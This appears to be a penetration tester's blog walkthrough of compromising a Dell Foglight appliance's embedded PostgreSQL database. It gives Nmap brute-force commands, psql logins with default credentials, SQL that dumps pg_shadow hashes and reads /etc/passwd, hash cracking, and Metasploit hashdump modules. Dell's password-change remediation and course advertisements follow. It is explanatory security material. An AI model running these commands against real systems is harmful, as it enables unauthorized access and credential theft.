ATTACKING DELL FOGLIGHT SERVER

I was just talking to someone a little while ago, and I told them how I rarely run into Postgres on pentests. However, I have run Foglight, which is a Postgres based product. Ok, so what is a Dell Foglight box? A while back, I ran into one of these while I was on a pentest.

Meanwhile, let’s see…”Dell’s application performance monitoring (APM) solution, Foglight, blends business context with deep technical insight, unifying all users and data within a structured model built around transactions – leveraging our patent-pending Transaction DNA technology.

Source: http://software.dell.com/products/foglight-application-performance-monitoring/

Next, here is a quick walk-through of me attacking Dell Foglight using Nmap NSE, some Postgres syntax, Metasploit, as well as a free rainbow table website called CrackStation.net. It also covers the proper remediation for the attack. Yes, basically, I sanitized a pentest compromise notification document and then later turned it into a blog post. But C’mon it’s been a really busy week and this is still good stuff.

In the meantime, we will get started….

My Attack Virtual Machine

Here is the virtual machine that I used for this:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

username: strategicsec

password: strategicsec

Nmap Syntax

At this point, we use Nmap to show possible ways an attacker would identify a host running postgres.

First, we scan the system with port TCP 5432 to verify the host is running PostgreSQL:

sudo nmap -sV -p 5432 XXX.XXX.XXX.XXX

DellDell Foglight

 

Next, we execute the NSE script “pgsql-brute” against the system:

sudo nmap -sV -p 5432 –script pgsql-brute XXX.XXX.XXX.XXX

DellDell Foglight

 

NMap Attack Syntax Reference:

http://nmap.org/nsedoc/scripts/pgsql-brute.html

PSQL Attack Syntax

Here, we use the command-line Postgres client ‘psql’ to connect to the database:

Psql -h XXX.XXX.XXX.XXX -U Postgres -W Postgres

Dell Foglight

Dell

 

Next, we list all the databases on the postgres system:

\l

 

Dell FoglightDell

Afterward, we list the usernames, and MD5 hashed passwords (For the database and not the system)

select username, passwd from pg_shadow;

Dell Foglight

Next, we select the current database:

select current_database();

Dell Foglight<

 

Next, we create a temporary table called “secureninja” to store any data that we later might want to examine:

create table secureninja (input TEXT);

Dell Foglight

 

Next, we copy the /etc/passwd file into the secureninja table that we just created:

copy secureninja from ‘/etc/passwd’;

Dell Foglight

Next, we display the /etc/passwd data that we copied into the secureninja table:

select input from secureninja;

Dell Foglight

 

Next, we delete the temporary table from the customer database:

drop table secureninja;

Dell Foglight

 

Next, we exit the Postgres database:

\q

Dell Foglight

 

Using a website like https://crackstation.net/, we can check the hashes for each database user (vkernel, root, Postgres)

https://crackstation.net/

 

Dell Foglight

Dell Foglight

 

Dell Foglight

 

Dell Foglight

 

Here we start to use a common hacker tool call Metasploit to attack the database:

cd /home/strategicsec/toolz/metasploit

sudo ./msfconsole

Dell Foglight
Here you can see that the Metasploit Framework has loaded to its main page:

 

Dell Foglight

 

Here we use Metasploit to dump the Postgres database hashes:

use auxiliary/scanner/postgres/postgres_hashdump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

Dell Foglight

 

Next, we use Metasploit to dump the Postgres database schema:

use auxiliary/scanner/postgres/postgres_schemadump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

Dell Foglight

 

Here you can see that Metasploit successfully dumped the postgres database schema:

Dell Foglight

Alright, now on to how to fix this. Before we cover how to fix it – quick shameless plug:

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Remediation

Dell provides documentation on how to fix this vulnerability.

How to change the default passwords for the embedded PostgreSQL database.

Description

How to change the default passwords for the embedded PostgreSQL database for the users vkernel and Postgres.

Resolution

Log into the console of the virtual appliance, either directly in vSphere Client/Hyper V Manager or establish an ssh connection using a suitable application.

  • Log in using userid vkernel(default password vkernel)
  • Then become the root user using the command su – (default password password)
  • Issue the command /usr/local/vkernel/scripts/externalDbAccess.sh then press ENTER
  • Follow the prompts, as shown below:

VKernel-vOPS:~ # /usr/local/vkernel/scripts/externalDbAccess.sh
1 – Enable the embedded database access from the outside world
2 – Disable the embedded database access from the outside world
3 – Set the database users’ passwords

Please select one of the above:3
Stopping VKernel collector…
Initiated collector shutdown. It will take some time for the running collection tasks to complete.
We have now stopped VKernel collector
done
Stopping VKernel monitor…
VKernel monitor has been stopped
done
Stopping tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat stopped
Please enter the new password for the database role postgres:
Please retype the new password:
Please enter the new password for the database role vkernel:
Please retype the new password:
Unregistering the appliance from previous database…
Unregistering the appliance from the previous database is done
Migrating Hyper-V collector…
Migrating Hyper-V collector gets done
Updating database multi-appliances registry…
Updating database multi-appliances registry gets done
Updating VKernel configuration…
Updating VKernel configuration is done

Configuration completed
applying the password for user Postgres
applying the password for user vkernel
Starting tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat started in normal mode
Starting VKernel monitor…
VKernel vOPS Server 6.0: Build 120918.1924. Schema: 8-11.55
We have now started VKernel monitor
done
Starting VKernel collector…
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel collector has been started
done
VKernel-vOPS:~ #

Remediation reference:

https://support.software.dell.com/foglight-for-virtualization-standard-edition/kb/99015

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

This post was written by Joseph McCray

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.